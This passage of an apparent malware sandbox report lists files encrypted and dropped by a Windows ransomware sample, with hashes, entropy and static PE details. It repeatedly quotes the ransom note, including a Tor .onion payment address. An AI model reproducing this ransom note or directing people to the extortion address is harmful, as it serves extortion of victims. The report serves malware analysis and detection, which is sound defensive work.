                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Documents\NEBFQQYWPS.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.860162591310388
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BX/DJqu3xVZsjDntbrij7ef8GUrWbYIfz/4D2eLliC2ZXddo96axoq3Pz2YLbtp5:h1r3RATtOEXIW7fz/4D2KkVZXd2NxVbZ
                                                                                                MD5:1AAEA43ECD9378F5CC7083E139902ADA
                                                                                                SHA1:8FE86573DE4E5F17692AAA46F3B32D713BB5AEEA
                                                                                                SHA-256:FD5C697848A5ED8A0F32563FAD7066101091C4B247778A4FEA4A41D689C61694
                                                                                                SHA-512:2F13D1F482E1C564B488835CEB64C3827702C42DA0F059D33FD6BA2B427FE78DE251ECF23F533705D3402DD1BA3268ECB382438C38F8CA70E94A8EC3BC1800BB
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\NEBFQQYWPS.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.84046254448587
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:M5vvkd/NsvjckfJ8vx51NsKewcIj5sCiQD630U+58lI4A5iMfkM:Mxva4ckfJmP1DewfFsCi5658HAlcM
                                                                                                MD5:FC4F245BD4F6E01D2C389A39B25252F5
                                                                                                SHA1:D82351AB06B83BAFBDE964838EDA9D968773A7D0
                                                                                                SHA-256:3A21129774A83A3C9D9B2860EAFA8A4807B3F9FBF8A7AA6201EC1D0C514E99AF
                                                                                                SHA-512:178ACCB24E0C7B4C592A4E1A8BB43DA61AB0F7EFEC37CC28090FF795E33191C39588289D3F4AA0D5F904605C240245A7622303379F6AFD40F11CBFD45A102C15
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\NEBFQQYWPS.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.842650978637729
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wskIMTf8m348Y9wm99fwtyQjn9xn6OXcZv30IlZ4tFgrxfTkEMlUXAj4QgZImC3Y:w0MT818kwm9qvjrXcZvE2Z47gavPjNgZ
                                                                                                MD5:9662A5D86F4A9D7B9FB3AAB32F5E7972
                                                                                                SHA1:7126F3CC48372C358754ABBEF7B7D122DFC49188
                                                                                                SHA-256:4A0F6B52FF0A92407A5F3CCE0D537531F4BE1525C840E6DA0E9D3C10BC512E30
                                                                                                SHA-512:14038C414C7E1C0C9176CB1F632A34912811799A33684F8E774440EDADC7E50C862BD32520749D8EE76AAC8C03EA23C0BAB5925ECC0454C9D31FFCCDAE9FA7D1
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\PIVFAGEAAV.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.845789735761763
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:aHqM9pGm6Gx36TpmuugZiOxnN0heyeHkcG9pJbJU6Tnr0GBdg7Mr:aR9hxKQuuIT0sjHj+TbJU6T4Gk7y
                                                                                                MD5:13C1F58A3186AD348B218FFD56A6DC94
                                                                                                SHA1:1607ACAEBC12451E6904DE64A2654A092DC0F5FA
                                                                                                SHA-256:DE37B93AAC2B660623CDAACFAB14CD93DAC66E17C78CBFFED854F1317B9315F0
                                                                                                SHA-512:FC13FC3949641C3E5163681B81EBEE9015AA1F16F91F0A728980200367F88D2BA6D211E210E367DB428DC37E304259B6BD37703062048E6D5E714D2A15B40BD9
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\PWCCAWLGRE.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.851500152944476
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ANx/Khr0q1FQwHzHDYnyWJ2Icre2q0QR8F4G/GS2hrLv2rHLVSyAs:Fhr0qcwHXYnr2IeKG/GLN2H5JAs
                                                                                                MD5:D61DB515A08C267708DC3833197F6636
                                                                                                SHA1:349CFBFD4BA86E84708BCF3F488C314514442D8D
                                                                                                SHA-256:446F8C4A53F4892BC89C46AF1629DC392F3336062DA95DAB85492420EC373B1F
                                                                                                SHA-512:FBD11B162AEFFC02AEA0B873DC3D0AA541AEB8ACBD70560BA79D0ACC04AF677A338D5B1713795A0F22CE0F5A631776CB818DEFA7DC2DECB6700B0E49665542A7
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\QNCYCDFIJJ.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.846962049983888
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:2ZqX4zQldjHP5I7xL5uV8yKbItMS1jKVxCuNsu12F/BBIlDgkjlz:SqX4zQl90v6fjKVPNihBazz
                                                                                                MD5:A17A510DBCF91F53E799830E0674AB47
                                                                                                SHA1:82AF1AE9832D7F9FBB7B80F3E28B61FB957D08E6
                                                                                                SHA-256:3B1817FD465FBCA75D581E17256814A78D398C896D5A6AA57DE4C08326A91EA4
                                                                                                SHA-512:E808BBC2796ECB1FA96160BF1AFABFDFBCD3431EE9733231F18F79A09D0061597CE3098B425921C737ECFCDE1FF72352F090D56163D7A931EB9CDD6B4FCCEFC9
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\ZQIXMVQGAH.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.86480495833858
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7/UDpq6TvSNWSPrzaLG1arJtJBByiGOGPbQyq9eHSBqPHid:767y/rWCytRLGDA9ZqCd
                                                                                                MD5:55AD64878378894B684F294F3A844256
                                                                                                SHA1:AC0AFD9E3D358C3EDC961E2AE58CFAEC8CCDCD16
                                                                                                SHA-256:8C6DE51AE3212E4004EA8D5253716BF81DF5992154DF55561EDB6E9D317E84E7
                                                                                                SHA-512:2934948325C0A23C1218618DB59118B6871571EF3AD3914B7FE6A98E9BF15C81AC8811073E2DA7677240267A3FA6DD6942CDEC8DE3F35FBA366F99861AF2D542
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Documents\PIVFAGEAAV.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.834738160710846
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:rIsbYguLm37e6d2qWBrh4k/Vh9/zwflE897cLpeLGIqIG1SMl7Y1vddGL3km:rls5LmLS3rX1ilXcqqIGt4FETkm
                                                                                                MD5:EB26D44244E565161ABE421F19FFA344
                                                                                                SHA1:B557E6F1E91A4E403A5801A3186F6FEEB66D1ABC
                                                                                                SHA-256:00B35761C0F300A9BCD71504CFB9169C28E56C613F02D4E066426A48A790D60F
                                                                                                SHA-512:7CC7458D389370522042C1AA7721E263B1DC5E754E243141203D1ADAD589BA4E996B3FB041DA85FDC0D2970EE5111F69B2B855D82795149226D1B6A0C8304C42
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\PWCCAWLGRE.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.839882686724072
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:jnPoqOSAZLE+M/6hJbBglmSBFcHIR3BQ1iPSp0tLWKscnsqR4PsyL:LPzOSOMO0B3Q1iPSp0Ocnsgiv
                                                                                                MD5:5E4DD90DFD64070D54EAA22C7C045CCA
                                                                                                SHA1:1ECCF6FF79B0B965C15DC32CB5FCFBBE8DC67DFF
                                                                                                SHA-256:4A74FD50EC32DC69FBD43BF64F72F8B24ADABE0A6A93A8168A19F93482C9D377
                                                                                                SHA-512:DB1A23643AA861A7F6308FF9871B44F1682DFDCCF727B4CE5A5AAFFED798CE09CA02724E981612CF1D7E4BEC8454D51620ADC0E13ED1FD2CA297D5B003364FE6
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\QNCYCDFIJJ.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.849175667279364
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:T2le+IZJi0KA4X0BNYuFo1YRU8eO8mdHeN0zcPAUvKxqvrLuVl26FTwYGsknX2s:TK3JU4k7vm1Md+NVPA6Ks2NwYGsM2s
                                                                                                MD5:79F7AB5E3B55478AD50A6CEE7EE53BD3
                                                                                                SHA1:7832CBA76CBA7740237D08E42972B754A026077E
                                                                                                SHA-256:4D3B2DE9431A17ADDF40875BD10F50B994975ECB795DE521319C1CEF42D35FCB
                                                                                                SHA-512:1B26C9882B96C2C52AA4BD6FE0E8AA80FFAA81222124B6C82555B72859368B0A1C692255567CD7A40BC8949CD9508722BDBB347A4DB7BAB4D6E8149414F2EB02
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\QNCYCDFIJJ.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.846776469421319
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Ids9zpab06Fy8z7VCmieywCwsJfE4PetvpAcFBvwDo5Cm5g:d9zmFyPDeywzEfXPetvdFBID0g
                                                                                                MD5:3862C81A76CA758590CF929162355AED
                                                                                                SHA1:6CCC1D612B22431F1E86A81F96C201B7CF24E955
                                                                                                SHA-256:0AFB3ED58DE632E7072ACB639258B06A3204C03E9B458F50AFF383983DC68EDB
                                                                                                SHA-512:A6992BC0D6E5821ABEB6955CBF70D224A5CECE206186D144DBC915A56B8215FDE0A4B6D72264F1EA59E36DF4A35DD9CE421445DBA66D1CE30203CAB839AF7036
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\SQSJKEBWDT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.849411656238164
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QSkw0K6lWs6a7I+5kliZWmvSKfVb5FG0bT0yVK1vla+iY6Rw2KoWFTS:QmGWs6zlHmvSKfVpQllKYtpS
                                                                                                MD5:ADDD6FA11B59BB8E93E3D8CB833EA5B5
                                                                                                SHA1:44412180DC7946F4CF4717E3F33CB6DFC9613C61
                                                                                                SHA-256:8042FE6FC493EABE1BF10FB58317B5CB6AD59AFDA24D7364E1EF163A2BA07F95
                                                                                                SHA-512:9E699A4FAE6AD5F132CEBB448B6B4FCE10037340DE23BAAB22C16ADAE4CF20E79E742C9434C39F18332B8B7B1630332C0E951A910BC66B00F43226C084E794DF
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\SUAVTZKNFL.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.848487881347847
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:dKbpT6UMC8oTvcO/1h31pr0/GynDiSgyO4Nourgr65GoEUj:mH8o/nFprkTeyOurgr65zj
                                                                                                MD5:9A404FDFF486005288223CF665F124B7
                                                                                                SHA1:28F9183B410B35F9EE6ECE649D62DBBA45587E4B
                                                                                                SHA-256:8974F1295133975EB8FFA4A9DA9742A695E8A55D0FDC147308885FC45F36BE0B
                                                                                                SHA-512:F4660D0F769EFB4AA7620FC73D4123B6BE5C505B94DBB9C1C013C4849AF1FB6F375B302BA7090D2BBD20C80A53F1F18187DDCA4B37DEA31693FA28300054DD2F
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\SUAVTZKNFL.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.871023076197927
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:I65aMIWanUrTXrqip19A/iXONf0G32OhuJNCPWxBSzLWFnmh4glS9eqIbLibo9Vu:wMf/TXhOlWKihmygw97IbEovsH9
                                                                                                MD5:086CC43354BB99AFE98902452D2AAEE5
                                                                                                SHA1:A408C6156E7259249886466FB38B39A6DB1981E4
                                                                                                SHA-256:CFDA11779C3047AB9D9D365B87D5DF676FCC4A1E154969242AD58270B7403E32
                                                                                                SHA-512:C3933C92721A86272CBACAC0EA20BAB36EB3BFAB0050442CA1381F9F54C3EAA396F82FBC3FA9B93EA9C181FD5FB9DA5A45E61DB420DB31F4E2F6B6BDFE99FAAA
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\ZGGKNSUKOP.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.837098324502265
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wSuSq2doCBs7sRl9xuMfOZoUP47mh6yLetoZqvrqpw2aHO:Nq2d3Bm8NfOGUQezLprwPHO
                                                                                                MD5:1E3698229F49DCDE5257F94335CA0329
                                                                                                SHA1:BB16295E5E30194ED3513EBF37C5A48194018E4B
                                                                                                SHA-256:D05B7B4B7D79E4666AEF251C2C5CA469931E9B28F9766DED9A44B518130FAB00
                                                                                                SHA-512:4ADDA85323B1B836564D208E7886DC47A360FEC4112A0EB036AEB8BA1096D8338CB2E9EE07A28A51D4F918F322BCCAA66C78BBB1AF9CEA612AA7E9EC8E4DA811
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\ZQIXMVQGAH.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.86989470255484
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:82ZjgUQWjkC0D6+q4iHHRn+A8vVSuYers1dGBmBpe/RjN:tFgUTLDHEAVYrYNpe
                                                                                                MD5:084570512ADCA98CA2A8785B4550B049
                                                                                                SHA1:1475CECD9AA085F229081ABBD54CD9F40F37FB13
                                                                                                SHA-256:BF707092239C420969C884945D68853D4A344DDB3F257901F1F99285008A29E7
                                                                                                SHA-512:F3DE78E8B871B85C171C78E4D45A2F7F10CFE76126E2580BE0986910EC1AC3C164ECAB3929F0AA71A09C987A512F32839E4BECBB2E82C5A56049A7A140C3BFA2
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\ZQIXMVQGAH.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.880048805523424
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:uDQ4e3nEdkX5rESzoZnBGV6EJJIywvG4T1GgVikD43YGTCgBpBQfzJKx45Tiz:uDpeXEdkpAS+nwVNIBhUJYyCgafzJ40g
                                                                                                MD5:DD6767708926FFF65C968DFFFA38932B
                                                                                                SHA1:D3E8D38EA838539CA0BEEC7B2537FD317AEAB469
                                                                                                SHA-256:2F4F674570EAC51A9F87FD4B512142F6F3BDF7D2CDBD234A82F998CE43B61EE1
                                                                                                SHA-512:9E8470EE58F18103ADCC5BA10A70617BE78F0DEBFC09412894B2212FB1161F6903E198EB9A8D718E558412FF7D6DAC007743F54CA2C1F450D60E9EA9E0A04EF3
                                                                                                Malicious:false
                                                                                                C:\Users\user\Documents\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Downloads\BJZFPPWAPT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.881997945811074
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0lTytCBBAmSSdOug4T7pOVwJJRqOH7t0cfSq3tz3GRwliFfkosITb:6T+CBBhnguTHRqObt3fVGBFfpTb
                                                                                                MD5:D7A265F9E143323816398DC1C3EEBEA8
                                                                                                SHA1:0C070CEFA695080AFC441927DAA4AC124A9FF38A
                                                                                                SHA-256:C9C6FB04013FBC15A77D3CEB0F280F08678A9AD5D075C546B420E9281DD4C225
                                                                                                SHA-512:3DC986552780FDBFE03AB30992B2C40B4FDC4727BA0C8A9AA84458F29D6CD3B3E257A67AEF9CBC66D0578E98EC56D056A1F60CF352E1692F03D1B0E84EBA4DE4
                                                                                                Malicious:false
                                                                                                C:\Users\user\Downloads\EEGWXUHVUG.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.85109205906326
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:CG15P3fsXjOh0awxTIfNCOhHGYRUwueYQhc6KBrfEZpH3k1jRdqCSXZdU3gF:CyvfajyTwx5ojEeycXkLdq4w
                                                                                                MD5:03AEC6E44C20BC1FE9360937B0833003
                                                                                                SHA1:2098BD486032926793E6A148E7258A949DAF179C
                                                                                                SHA-256:0ED38DBA83F41AB7E011F18B9FC413092E8ABB947B381FC262E1CE7D9F3BD1B5
                                                                                                SHA-512:A24C4E39E20E8AD0B8E86EEBBBD568C8170E0EB3CA6D123437F6EFCA2C8CF00A87CD3FB00B822DE808ECC016C9203A02597675335360861D16E63FB9F6B8A819
                                                                                                Malicious:false
                                                                                                C:\Users\user\Downloads\EFOYFBOLXA.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.847928466568488
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:cdVxcHUU71+xIep2IiuIKbChZLLw2zK42xAWF6AVXVrZVRYpxxArnv:w5UdgCh5xz8AWrxt5Qx27
                                                                                                MD5:034BE722B10F11D85A79C8BC4F22FA2D
                                                                                                SHA1:14D37B11F5D6C8A07A71D63E1130A1538990C8FB
                                                                                                SHA-256:40F316CD4ABC31394FEE283886CAA3491F695FF81A6FCEA8C6876F887FFFFD9C
                                                                                                SHA-512:4B46BA8A293D55E308F4BC6895C026285532350346F3437A64AA830ECDBFF363D83AB5DE4471D81A75390F6DC4535E1BECBD77366B2AE93ACF74BACD715D0363
                                                                                                Malicious:false
                                                                                                C:\Users\user\Downloads\GAOBCVIQIJ.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.864864485786807
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:1J9zChz3jPdf80JDvv4f6OV98DYHYFlMYvBnTVI2+dxJZO0LYsf+brbi8yP3+eG:1J9z0z3j18+Dvvit4FWYv3Ux3HYsfyCQ
                                                                                                MD5:72E510636496991955E7B0FA1E431D55
                                                                                                SHA1:D59F3460D412AF55AD4BBD29D276BC94BBCF2E50
                                                                                                SHA-256:B6609FB4381025E8FD36CE39D55FC97907991CD44001EDBA953E4F1977D584CB
                                                                                                SHA-512:358440A45AD9C77C65BB23EB7678DAFBA5A6BCFDAF02FEF40C0D39D96D74FE11A68FD4FD6A57381CFB9EDFCFB381764CAADF10C9DB7C7E2164BC0D74DD33E35E
                                                                                                Malicious:false
                                                                                                C:\Users\user\Downloads\GAOBCVIQIJ.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.864214790882372
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:l68AMYVkb8Pe33xoIDncisj3VTNRuUl8x4QxcrRc2TA8zyB9Gbgi/:l6fMI5m33xncNjVTHuU0yNAULb9
                                                                                                MD5:B40A66A91EE1ED803E303020E03BBF35
                                                                                                SHA1:DEC4FF4EC80FCBB46E4E55D8D855ACF45B65CC3C
                                                                                                SHA-256:675598F7424C0A1007E4E220CAF72921D2BA3D5B46F82B8911F0EA9F9CB40700
                                                                                                SHA-512:B24EBC655EB78DBCCC14A2B5EC913F5DF63DAF9418A32CA13A32C823F422E13BD59573252C436D957AEBA853FFBCE329E73A0BA2C44E1C3C6EF7ABB2526CE619
                                                                                                Malicious:false
                                                                                                C:\Users\user\Downloads\IPKGELNTQY.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.853526068147351
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:5+qDlUHMM6ZnEiPfJnSRkBCVvY/r4S+geBUKlaifGfhWx1TZMh0cdUZFgOW:5yDYnEiH8RkwNYD3qlaiucxtK0cYgJ
                                                                                                MD5:83FA4BBF3FE4843AACF96C9E7F12EE81
                                                                                                SHA1:69451AADB4CC88C1A543BF6EFEA2D375B72E5B8C
                                                                                                SHA-256:A4C2AE596182D2A08D97E3E7B3D2F6243222A1DC3C9A7A7C5691497C5E8C09F6
                                                                                                SHA-512:AEEA83DC67A425D420245038354C8DB54EA17F92F0B1DDFD97AEF2C008151A19D7CD29DA060CF6D97B408B107179CFA52682E776F0D4F064CBE3DDD384016E70
                                                                                                Malicious:false
                                                                                                C:\Users\user\Downloads\LSBIHQFDVT.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.857695718320419
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JjeLhxp0I7THzUaQpDIMaBBp8mrMBOpDvUE3ZR1wyWatdI5:JaLt0y7SDIMaamw4p4E3Tds
                                                                                                MD5:CF33019E5C9573B5650CB247B365CAF7
                                                                                                SHA1:CF379D59200758A7EFAC253DAA168F3E5B3DA65F
                                                                                                SHA-256:21598A059269A24F2B5A770F2BF5F5C65CE80C5AB8946B3ABA89A749FE0D8BD1
                                                                                                SHA-512:6C8BAD9F4E22EF367B28F3994BE9182ACE8A991ED3BF9DF839586B0D4592029D7B0BA08A376B4D12F2B81B466D425D888122D3EE0E6F93130F53B1F4B1A3520E
                                                                                                Malicious:false
                                                                                                C:\Users\user\Downloads\LSBIHQFDVT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.869799554992408
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7Iukp5dnr1YEy96567QGhTkL4Z8Y3gRT0akvflimLaFU5Zix8Q:7D0YEy96A7QGhoEgRTZAgyaiit
                                                                                                MD5:2B23BBD26D52B32258216767FABB1410
                                                                                                SHA1:5622D6A26F3E72414F9864790C23C2BAD40ECFAC
                                                                                                SHA-256:07A3B88783EC86BC160D4E2C171C4FDF3DEA445F098F15B82C15B422E816BEF2
                                                                                                SHA-512:5D82FCCAB4E5E69D16282E36E7BFFF25A97741E7A4CFEAF588126BEF3B4480A87F4AFCFD768480188B8F5DB051948E1892A5DEA43B869C3249613FFB9BFEDA6E
                                                                                                Malicious:false
                                                                                                C:\Users\user\Downloads\NEBFQQYWPS.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.843288920796012
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:uDS3gPTEyniEP/iqacYSgXl66U8/Dc0PoV8tzDnBHgn7:a74EPKcYFXl6GD3PWSzNHgn7
                                                                                                MD5:F3947AA26EB3CD97917194E65E60D0DB
                                                                                                SHA1:D552DF64AA21E7BDBECB6FFB5781C3F16DF5F96D
                                                                                                SHA-256:331049B76220F4F249B051C512BD948857757371C1C0CAC369C4C1AE0209B2D9
                                                                                                SHA-512:695C6177911F9719AABBBD435829F6D248DD8F36C5E7F5A41EE88B602CFD4DBB50FB03809797E2851D48E120FB8D67A5828D54FF933E7181D182C84CD0B0AF3D
                                                                                                Malicious:false

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                Entropy (8bit):7.375182779773526
                                                                                                TrID:
                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:7906dc47_by_Libranalysis.exe
                                                                                                File size:23040
                                                                                                MD5:7906dc475a8ae55ffb5af7fd3ac8f10a
                                                                                                SHA1:e7304e2436dc0eddddba229f1ec7145055030151
                                                                                                SHA256:1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
